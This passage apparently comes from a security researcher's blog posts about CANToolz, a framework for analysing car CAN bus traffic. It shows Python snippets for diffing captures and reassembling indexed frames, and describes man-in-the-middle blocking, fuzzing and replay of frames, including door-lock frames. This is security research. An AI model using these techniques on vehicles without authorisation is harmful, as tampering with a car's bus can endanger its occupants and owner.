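    h = bytes.fromhex
    bufs = DiffBuffers()
    bufs.new_buffer("white noise")
    for _ in range(3):                          # idle traffic repeats in a loop
        bufs.sniff(0x130, h("45f4"))
        bufs.sniff(0x1A0, h("0000c812"))
        bufs.sniff(318259472, h("80000000"))
        bufs.sniff(318255632, h("80000000"))
    bufs.new_buffer("Windows Down/Up action")
    bufs.sniff(0x130, h("45f4"))
    bufs.sniff(0xFA, h("c1ff"))                 # ID never seen in the baseline
    bufs.sniff(0x1A0, h("0000c813"))            # known ID, unrelated value change (noise)
    bufs.sniff(0xFA, h("c2ff"))
    bufs.new_buffer("doors locked")
    bufs.sniff(0x130, h("45f4"))
    bufs.sniff(318259472, h("00000000"))        # status byte 0x80 -> 0x00
    bufs.sniff(318255632, h("00000000"))
    return bufs


SAMPLE = build_sample()

if __name__ == "__main__":
    print("new IDs in window capture:", SAMPLE.diff(0, 1, id_only=True))
    print("all new frames in window capture:", SAMPLE.diff(0, 1))
    print("new frames in door capture:", SAMPLE.diff(0, 2))
    print("search 0xFA:", SAMPLE.search(0xFA))
```

The "ID only" view is empty for the door capture because status frames reuse known IDs, which is why the full diff is the one to read on a bus that exposes status frames rather than control frames.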
<br />
-----------------------------------------------------------------------------<br />
Also some changes for the USBtin module: now we can set the speed to any value (in kbaud), not only the preset values!<br />
<br />
Another important thing: a 'delay' parameter has been added to <b>gen_replay, gen_fuzz, gen_ping. </b>This is important if you do not want to DoS the CAN bus during a 'write' operation.<br />
<br />
Also a very nasty bug was fixed for USBtin... now everything is fine 8))<br />
<br />
P.S. It is still very young software (1 month!), so there can be bugs; we are working on fixes and improvements. Hope for the community's help 8)<br />
<br />
P.P.S. New design of WEB GUI! Thx to my wife <a href="http://cargocollective.com/svetodesign">Svetlana Sintsova</a>!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br /></div>
Alexey Sintsovhttp://www.blogger.com/profile/16563676942164858618noreply@blogger.com2tag:blogger.com,1999:blog-4711612808026791519.post-75022436785709972312016-03-31T05:45:00.000-07:002016-04-07T12:06:43.968-07:00CANToolz: mod_stat features<div dir="ltr" style="text-align: left;" trbidi="on">
Playing with some dumps of CAN traffic, I am trying to implement <strike>not</strike> smart traffic-detection features in <b>CANToolz</b>. The main problem: when you see a lot of CAN frames, you can't easily find the interesting data and commands. For that purpose I am trying to improve the <b>mod_stat </b>module.<br />
<br />
<div style="text-align: justify;">
My friend from Moscow (@<a href="https://twitter.com/_Saplt">Saplt</a>) is preparing for the next <b>HardwareVillage event</b>, where we have a small section dedicated to automotive security (btw it will happen on May 17-16 in Moscow during the <b><a href="http://www.phdays.com/press/news/46140/">PHDays conference</a></b>). So he has sent me some raw CAN traffic from his vehicle (<b>mod_stat</b> can save all frames in an ASCII format, and now I can replay this traffic with <b>mod_replay </b>here in Berlin). </div>
<div style="text-align: justify;">
<br /></div>
<h4 style="text-align: justify;">
Improvements in 1.2-1</h4>
<div style="text-align: justify;">
First of all I wanted to improve ASCII detection. Of course ASCII is not a common data format, but for VIN text detection and some other things that are in ASCII this feature could work. I have added ASCII detection before generating output, so now this output should look better...</div>
<div style="text-align: justify;">
I have also found that some frames have a "fragmented" structure (CAN frames are limited to 8 bytes, which is why vendors use one of these bytes as a control/index byte, so you can transfer more data in one "message" by using a few CAN frames). A popular format is<a href="https://en.wikipedia.org/wiki/ISO_15765-2"> <b>ISO-TP</b></a>, so <b>mod_stat </b>can "re-assemble" CAN frames into ISO-TP messages (if any are found). ISO-TP is also used for <b>UDS</b>, and I have added detection of UDS services. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
But ISO-TP is not the only format. I have found some other formats with an "index" byte in the CAN data field. Maybe they are standardized formats too, but I do not know, so I tried to build a generic detection of the "index" and de-fragmentation of the data using the found "index". This feature works only for CAN frames that are repeated in a loop.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<div style="text-align: justify;">
<span style="text-align: left;">Detected chain:</span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYTf9jvPzPR5jln7yJhaxayqR7_x5yd_JfZ9NXBLjMR-yEY7ETOTAg8MFq4zVbcSfiT3_E9A1eCJAvUsa8CvLnROeBz7FXjiOychnTBBMHLDJIrFlFu0Qb_DOrWLu-1XnfkS9V6OM13RnD/s1600/b12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYTf9jvPzPR5jln7yJhaxayqR7_x5yd_JfZ9NXBLjMR-yEY7ETOTAg8MFq4zVbcSfiT3_E9A1eCJAvUsa8CvLnROeBz7FXjiOychnTBBMHLDJIrFlFu0Qb_DOrWLu-1XnfkS9V6OM13RnD/s1600/b12.png" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
Here we can see a <b>non</b> ISO-TP message which was re-built. I think we can play more with "smart" analysis of CAN traffic; these are just the very first tries... Also, if the format is not so easy and the "loop-detection" mechanism of <b>mod_stat</b> can't find the logic, we can manually set the "index" pointer, "index" size and value. After that <b>mod_stat</b> will try to re-build the chain. </div>
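One way to implement the loop-based "index" detection and the ASCII detection described above, as an added example that is not CANToolz code. It assumes a one-byte index that counts consecutively and a payload that is identical on every loop; the function names, the frames and the VIN-like string are constructed.

```python
import re


def find_index_byte(frames):
    """Locate a one-byte 'index' in frames of a single arbitration ID.

    A position qualifies when its values count consecutively, the capture steps
    through them cyclically for at least two full loops, and every index value
    always carries the same remaining bytes. Returns (position, ordered index
    values) or None.
    """
    if not frames:
        return None
    for pos in range(min(len(f) for f in frames)):
        values = [f[pos] for f in frames]
        order = sorted(set(values))
        n = len(order)
        if n < 2 or order != list(range(order[0], order[0] + n)):
            continue                                   # not a consecutive counter
        if len(values) < 2 * n:
            continue                                   # fewer than two loops captured
        start = order.index(values[0])                 # the capture may begin mid-loop
        if any(v != order[(start + k) % n] for k, v in enumerate(values)):
            continue                                   # not stepping cyclically
        chunks, stable = {}, True
        for f in frames:
            rest = f[:pos] + f[pos + 1:]
            if chunks.setdefault(f[pos], rest) != rest:
                stable = False                         # payload differs between loops
                break
        if stable:
            return pos, order
    return None


def reassemble(frames):
    """Concatenate the non-index bytes in index order, or None if no index is found."""
    found = find_index_byte(frames)
    if found is None:
        return None
    pos, order = found
    chunks = {f[pos]: f[:pos] + f[pos + 1:] for f in frames}
    return b"".join(chunks[i] for i in order)


def ascii_runs(blob, min_len=4):
    """Printable ASCII runs of at least min_len characters."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, blob)]


# Constructed capture: three frames repeated in a loop, index in byte 0,
# carrying a made-up 17-character VIN-like string followed by zero fill.
ONE_LOOP = [
    bytes([0x00]) + b"TESTVIN",
    bytes([0x01]) + b"0000000",
    bytes([0x02]) + b"001" + bytes(4),
]
LOOPED = ONE_LOOP * 2

# Constructed counter-example: byte 0 counts 0..3, but the data changes on every
# loop, so this is a rolling counter on a live signal and not a fragmented message.
ROLLING = [bytes([i % 4, i, 0, 0]) for i in range(8)]

if __name__ == "__main__":
    print(find_index_byte(LOOPED))
    print(ascii_runs(reassemble(LOOPED)))
    print(reassemble(ROLLING))
```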
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div style="text-align: justify;">
As an additional feature I have added COMMENTs, so we can comment frames by arbitration ID:</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8Ee8SCu16TeZkyx4uBs-eXQNwGj9nUgUCyI8Wzz1yOPCLhmDq_DIB08QYqJGl9adGDVXBngZ5zDaYafiZDLUOUPu-KgULs774PXf9i2eiO-LMlLcUwlwiN-JTaOGmVboG7jNat2qIcaj8/s1600/b13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8Ee8SCu16TeZkyx4uBs-eXQNwGj9nUgUCyI8Wzz1yOPCLhmDq_DIB08QYqJGl9adGDVXBngZ5zDaYafiZDLUOUPu-KgULs774PXf9i2eiO-LMlLcUwlwiN-JTaOGmVboG7jNat2qIcaj8/s1600/b13.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
This should help with marking frames while reverse engineering. Both comments and manual "index" pointers can be exported/imported via a META file. So if you want to share traffic with a colleague, you can also share this meta-data. For me it is an important feature, because @<a href="https://twitter.com/_Saplt">Saplt</a> is in Moscow and I am in Berlin, but we can share data and work together! I also believe that both the meta-section and the traffic detection algorithms can be improved a lot; the current version is just a prototype, but I like it and want to share...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHGoMAkS-ZA9kc06lN4kMpbzefH1UNLRKI0JIejf4it0XqOXn8oufLjJ2j5QNgZ7IsyRPjRNESjJDiaEjFpreR78TgAjWPsJWWHQAUMUV4P7ud5VhL-hpDIP1UtumNeh-fsWF8WWT_aVh9/s1600/b14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHGoMAkS-ZA9kc06lN4kMpbzefH1UNLRKI0JIejf4it0XqOXn8oufLjJ2j5QNgZ7IsyRPjRNESjJDiaEjFpreR78TgAjWPsJWWHQAUMUV4P7ud5VhL-hpDIP1UtumNeh-fsWF8WWT_aVh9/s1600/b14.png" /></a></div>
<br />
P.S.<br />
Other fixes:<br />
- mod_stat print format changed. Now it is really formatted...<br />
- bugs in UDS detection during scanning<br />
- now mod_stat has ALL traffic, not only statistics. This is good and bad... good because the real traffic capture is available, bad because of MEMORY... I will think about how to improve this.<br />
- fixed a bug where the WEB interface did not work without the Internet (damned d3...)<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
</div>
</div>
Alexey Sintsovhttp://www.blogger.com/profile/16563676942164858618noreply@blogger.com3tag:blogger.com,1999:blog-4711612808026791519.post-13795533406120575472016-03-25T13:04:00.000-07:002016-03-29T02:42:52.850-07:00Yet Another Car Hacking Tool<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<br />
<div style="text-align: justify;">
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Few days ago I had a small talk (on our local Defcon group meeting - DC#7812) regarding CAN (</span><a href="https://wikipedia.org/wiki/Controller_Area_Network" style="text-decoration: none;"><span style="background-color: transparent; color: blue; font-family: "calibri"; font-size: 16px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">Controller Area Network</span></a><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 16px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">)</span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">and ECU analysis with help of </span><a href="https://github.com/eik00d/CANToolz" style="text-decoration: none;"><span style="background-color: transparent; color: #888888; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">CANToolz</span></a><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: 
normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> framework. Therefore, here I would like to repeat some of the ideas from that talk, give some explanations about "Why I have created Yet Another CAN Hacking Tool" and what are my goals. </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Here you can find original slides - </span></div>
<span id="docs-internal-guid-290a29cd-ba19-44c9-99c9-ffd72f19cfa8"></span><br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<a href="http://www.slideshare.net/AlexeySintsov/testing-can-network-with-help-of-cantoolz" style="text-decoration: none;"><span style="background-color: transparent; color: #888888; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">http://www.slideshare.net/AlexeySintsov/testing-can-network-with-help-of-cantoolz</span></a></div>
</div>
<h3 style="text-align: left;">
Intro</h3>
<div style="text-align: justify;">
<span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; line-height: 1.2; white-space: pre-wrap;"> Automotive Security is an extremely hot-topic now, and that is why I am interested in this field and very lucky to be a part of this automotive industry. Actually, this topic is HUGE: many of the technologies, big attack surface and blah blah blah….</span><br />
<span id="docs-internal-guid-a34751af-ba1a-06a3-af39-8a69720c90ca"></span><br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span id="docs-internal-guid-a34751af-ba1a-06a3-af39-8a69720c90ca"><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; vertical-align: baseline; white-space: pre-wrap;">However, the security of the vehicle's local network has been the main topic for the last few years. Yes, I am talking about the CAN bus, and this is a good moment to recall the awesome research done by Charlie Miller and Chris Valasek: </span><a href="http://illmatics.com/car_hacking.pdf" style="text-decoration: none;"><span style="color: #888888; font-family: "georgia"; font-size: 15.3333px; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">http://illmatics.com/car_hacking.pdf</span></a><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; vertical-align: baseline; white-space: pre-wrap;">. I am not going to talk about CAN security in general since this is a well-known thing (but highly important!). </span></span></div>
<span id="docs-internal-guid-a34751af-ba1a-06a3-af39-8a69720c90ca">
</span><br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span id="docs-internal-guid-a34751af-ba1a-06a3-af39-8a69720c90ca"><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; vertical-align: baseline; white-space: pre-wrap;">When I started my own “actions in this field”, I met one big issue: a lack of tools that could help me do what I want. Actually, on the Internet you can find many different tools for working with the CAN bus. These tools are quite good and helpful, but if you want to use them "together", perform a MitM or do something more, then you have to "customize" them. That is fine if you have one car... but what if you have more targets to test?</span></span></div>
<span id="docs-internal-guid-a34751af-ba1a-06a3-af39-8a69720c90ca">
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; vertical-align: baseline; white-space: pre-wrap;">Finally, I came into a conclusion that I need to have one common framework where I can work with CAN bus and ECU devices together with minimum "code-writings". If you are familiar with such kind of tools like BurpSuite or MetaSploit then you will understand my words. I wanted such kind of tool as it is going to make my work easier in case if I will share results with someone else or work in a team. Thus, my aim was to have </span><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">module-based framework</span><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; vertical-align: baseline; white-space: pre-wrap;"> that can perform </span><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">MitM (</span><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; vertical-align: baseline; white-space: pre-wrap;">or work with more than one bus</span><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">)</span><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; vertical-align: baseline; white-space: pre-wrap;">, will be </span><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">hardware independent </span><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; vertical-align: baseline; white-space: pre-wrap;">and have one-</span><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">standard interface</span><span style="color: 
#222222; font-family: "georgia"; font-size: 15.3333px; vertical-align: baseline; white-space: pre-wrap;"> and even </span><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">GUI</span><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; vertical-align: baseline; white-space: pre-wrap;">. One more important thing I wanted to have is an </span><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">open-source</span><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; vertical-align: baseline; white-space: pre-wrap;"> project – when </span><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">all people together will have access to more vehicles </span><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; vertical-align: baseline; white-space: pre-wrap;">than bunch of researchers. I think, together we can create more useful modules that can be used by testers, vendors (in an ideal world) and enthusiasts all over the world. </span></div>
<div>
<span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
</span></div>
<div style="text-align: left;">
<br />
<a name='more'></a><br /></div>
<h3 style="text-align: left;">
CANToolz</h3>
<div style="text-align: justify;">
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">With the help of our DC#7812 community (thanks to Sergey Kononenko and Boris Ryutin), I have created a beta version of such a framework. It is based on Python 2.7 (Python 3 is not supported yet). To work with hardware you need to (pip) install </span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">pyserial</span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">. 
Right now, I have added support for two CAN hardware modules that give access to the CAN bus via USB: </span><a href="http://www.fischl.de/usbtin/" style="text-decoration: none;"><span style="background-color: transparent; color: #888888; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">USBtin</span></a><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> and </span><a href="https://canb.us/" style="text-decoration: none;"><span style="background-color: transparent; color: #888888; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">CANBus Triple</span></a><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">. In the future (and, I hope, with the help of contributors) we will add support for other popular hardware.</span></div>
<span id="docs-internal-guid-290a29cd-ba1b-513c-7f8c-79f1053350c4"></span><br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Below, I am going to repeat some of the examples of CANToolz usage from my DC#7812 talk, present a "typical work process on CAN bus testing" and demonstrate how to use this app.</span></div>
</div>
<h4 style="text-align: left;">
Example 1: MitM with blocking</h4>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAVPSaqlHyzS5C-N_-qYxHZGyKNDwSDsMLkOPcv2hIXrktTAoYZll89ogATexcNPYu7bO52Vywc393XM93blpXEp3IFf6NZNrT38bvMnRcXXIznKb8wi6Che_1-U4L0xgJh_gKArK3jmkR/s1600/mitm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="465" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAVPSaqlHyzS5C-N_-qYxHZGyKNDwSDsMLkOPcv2hIXrktTAoYZll89ogATexcNPYu7bO52Vywc393XM93blpXEp3IFf6NZNrT38bvMnRcXXIznKb8wi6Che_1-U4L0xgJh_gKArK3jmkR/s640/mitm.png" width="640" /></a></div>
<div>
<br /></div>
<br />
<div style="text-align: justify;">
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">When you are "sniffing" CAN traffic, you do not know the exact source and destination of a CAN Frame (at the beginning, in general). This is where MitM can help you find the direction of the traffic, which sniffing alone cannot.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Let’s say we are trying to understand which of the CAN frames come from the CAN Gateway to the HeadUnit (HU) and which come from the HU to the CAN Gateway. If you, for instance, "cut" the CAN bus in between and connect your hardware, then you are going to have TWO interfaces - one from the HU and another from the CAN gateway. This already tells you more about the frames that you have (again, we are talking about blackbox analysis).</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">In addition, now we can handle those CAN frames before re-sending (we can use MitM), so we are able to do proxy-fuzzing on the fly, or block some CAN frames. Also, we can use blocking to understand which frames are responsible for what.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Let's take the "door-lock" example from a great book - </span><a href="https://www.nostarch.com/carhacking" style="text-decoration: none;"><span style="background-color: transparent; color: #888888; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">The new Car Hacker's Handbook (2016)</span></a><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">. Now we can block some frames "on the fly" (by frame arbitration field) and see if the door is unlocked after we did an action from HU control (if this is applicable for your car). Then we can block other frames, etc.</span></div>
<span id="docs-internal-guid-290a29cd-ba1b-df61-32a6-f92c8ec30230"></span><br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Then we can see anomalies and different behavior of the target car and its elements that could tell us more about the blocked/fuzzed frames! If you want to perform this action in CANToolz, you just create a configuration file (but be careful with your car when you "cut" in between):</span></div>
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgijWvBw4fqo8T3EcMYQy4VepxZbre4SK1CrgDtlUS5_daQZmtGnwRmJqYJOIqHl5DL2SJMX5-jKTOWZnimw-0ohJ11XIs7vjCzHShrFiW621ZMWtFPWD_rZ7hChwB6MeTIJx2OpkR7iOE7/s1600/mitmc.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="376" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgijWvBw4fqo8T3EcMYQy4VepxZbre4SK1CrgDtlUS5_daQZmtGnwRmJqYJOIqHl5DL2SJMX5-jKTOWZnimw-0ohJ11XIs7vjCzHShrFiW621ZMWtFPWD_rZ7hChwB6MeTIJx2OpkR7iOE7/s640/mitmc.png" width="640" /></a></div>
<div>
<br /></div>
<div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Here I would like to say a few words about the config file:</span></div>
<b id="docs-internal-guid-290a29cd-ba1c-b32c-d1ef-04025ff5b3fb" style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The first section is </span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">load modules</span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> – you have to describe which of the CANToolz modules you need. If you need the same module in a different instance, you can load it twice by adding "~1" or "~2" at the end of the name. You can find a full list of modules in the ./modules folder.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The second section is </span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">action - </span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">describe the steps, and for each step say which of the modules you want to use and what parameters it should have on this step. The most important parameter is "</span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">pipe</span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">" (value 1 by default), and it is all about the general design of CANToolz. Each module handles one CAN Frame at a time and each module has an INPUT and an OUTPUT. The module takes its input (one CAN Frame) from the pipe, does something with it and then PUTs it back. For instance, we have two pipes - let me just read this config:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: #222222; font-family: Arial; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: -24px; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 3pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">On step one, READ one CAN frame from the FIRST USBtin device and put it into PIPE 1.</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: #222222; font-family: Arial; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: -24px; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 3pt; margin-top: 0pt;">
